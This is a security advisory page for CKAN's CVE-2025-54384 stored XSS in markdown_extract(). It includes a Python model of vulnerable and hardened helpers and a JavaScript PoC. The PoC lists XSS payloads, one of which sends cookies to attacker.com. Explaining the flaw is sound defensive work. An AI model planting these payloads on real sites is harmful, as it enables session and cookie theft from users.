Security Vulnerability Report
CVE-2025-54384 CVSS 6.3 MEDIUM

CVE-2025-54384

Published: 2025-10-29 16:15:34
Last Modified: 2026-04-15 00:35:42

Description

CKAN is an open-source DMS (data management system) for powering data hubs and data portals. Prior to 2.10.9 and 2.11.4, the helpers.markdown_extract() function did not perform sufficient sanitization of input data before wrapping in an HTML literal element. This helper is used to render user-provided data on dataset, resource, organization or group pages (plus any page provided by an extension that used that helper function), leading to a potential XSS vector. This vulnerability has been fixed in CKAN 2.10.9 and 2.11.4.
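To make the failure mode concrete, the following added example (not CKAN's code, and not taken from the fix commit) models an extract helper that strips HTML tags with a single regex pass and then marks the remainder as an HTML literal, beside a hardened version that HTML-escapes the text before marking it safe. The tag-stripping regex, the `literal` class and the `render` function are assumptions made for illustration; the payload is constructed so that stripping an inner tag reassembles an outer one.

```python
"""Illustrative model of an extract helper that strips tags with a regex and
marks the result as an HTML literal (vulnerable), beside a hardened version.
Added example; this is not CKAN's helpers.markdown_extract() source."""
import html
import re

# Assumption: a naive strip-tags regex that refuses '<' and '>' inside a tag.
# Illustrative only; not claimed to be the expression used by CKAN.
TAG_RE = re.compile(r"<[^><]*>")


class literal(str):
    """Stand-in for an HTML literal type: a template engine would emit it
    verbatim, without escaping. Modelled on the idea, not on CKAN's class."""
    __slots__ = ()


def extract_vulnerable(text: str, extract_length: int = 190) -> literal:
    """Strip tags in one pass, truncate, and mark whatever is left as safe.
    Anything the regex fails to remove is handed to the browser unescaped."""
    plain = TAG_RE.sub("", text)
    return literal(plain[:extract_length])


def extract_hardened(text: str, extract_length: int = 190) -> literal:
    """Strip tags, then HTML-escape the remainder before marking it safe, so
    markup that survives the strip is shown as text rather than executed."""
    plain = TAG_RE.sub("", text)
    return literal(html.escape(plain[:extract_length], quote=True))


def render(description: str, safe: bool) -> str:
    """Model the template: a literal is interpolated without escaping."""
    value = extract_hardened(description) if safe else extract_vulnerable(description)
    return f"<p class='notes'>{value}</p>"


def contains_live_markup(rendered: str) -> bool:
    """Crude check a tester can run over a rendered page: a raw <script,
    <img or on*= attribute in the output means markup reached the browser."""
    return bool(re.search(r"<script|<img|\son\w+=", rendered, re.I))


# Constructed payload: nesting a tag inside another so that removing the
# inner "<script>" leaves "<scr" + "ipt>" behind, i.e. a complete tag.
PAYLOAD = "x <scr<script>ipt>alert(1)</scr<script>ipt> y"


if __name__ == "__main__":
    print("vulnerable:", render(PAYLOAD, safe=False))
    print("hardened:  ", render(PAYLOAD, safe=True))
```

Run stand-alone, the vulnerable path emits `<p class='notes'>x <script>alert(1)</script> y</p>`, while the hardened path emits the same text with the angle brackets encoded. The design point is that a strip-then-trust pipeline is only as good as the stripper; escaping the output before it is marked as a literal does not depend on the stripper being complete.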

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N
Reading the vector: the attacker needs a low-privileged account that can create or edit the affected content (PR:L), and a victim must view the page that renders it (UI:R); the main impact is confidentiality (C:H), consistent with session or data theft through script running in the victim's browser.

Configurations (Affected Products)

CKAN < 2.10.9 (fixed in 2.10.9)
CKAN < 2.11.4 (fixed in 2.11.4)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```javascript
// CVE-2025-54384 XSS PoC - CKAN markdown_extract() insufficient sanitization
// Demonstrates the stored XSS in CKAN's markdown_extract helper: an attacker
// submits Markdown containing HTML when creating or updating a dataset (or a
// resource, organization or group), and the helper renders it as an HTML
// literal without sufficient sanitization.

// Attacker-controlled Markdown submitted as the dataset description:
const maliciousMarkdown = `
# Malicious Dataset

Some description with <img src=x onerror=alert(document.cookie)> embedded.

Or using a script tag:
<script>fetch('https://attacker.com/steal?cookie=' + document.cookie)</script>

Or an event handler on any element:
<div onmouseover=alert('XSS')>Hover over me</div>
`;

// When CKAN renders the dataset page through markdown_extract(), the embedded
// HTML/JS reaches the victim's browser and executes.
// Which of the payloads above survives depends on the exact tag handling in
// the affected version; test each one against the target.
//
// Attack scenario:
// 1. Attacker creates a dataset with the malicious description
// 2. Victim (admin/user) views the dataset page
// 3. JS executes in the victim's browser context
// 4. Attacker can steal session cookies or perform actions as the victim
//
// Note: for educational and security testing purposes only.
// Always obtain proper authorization before testing vulnerabilities.
```

References

https://github.com/ckan/ckan/security/advisories/GHSA-2r4h-8jxv-w2j8 (GitHub security advisory)
https://github.com/ckan/ckan/commit/6d0065f2fc7e2682196d125275af34b93e9e554e (fix commit)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54384", "sourceIdentifier": "[email protected]", "published": "2025-10-29T16:15:33.893", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "CKAN is an open-source DMS (data management system) for powering data hubs and data portals. Prior to 2.10.9 and 2.11.4, the helpers.markdown_extract() function did not perform sufficient sanitization of input data before wrapping in an HTML literal element. This helper is used to render user-provided data on dataset, resource, organization or group pages (plus any page provided by an extension that used that helper function), leading to a potential XSS vector. This vulnerability has been fixed in CKAN 2.10.9 and 2.11.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/ckan/ckan/commit/6d0065f2fc7e2682196d125275af34b93e9e554e", "source": "[email protected]"}, {"url": "https://github.com/ckan/ckan/security/advisories/GHSA-2r4h-8jxv-w2j8", "source": "[email protected]"}]}}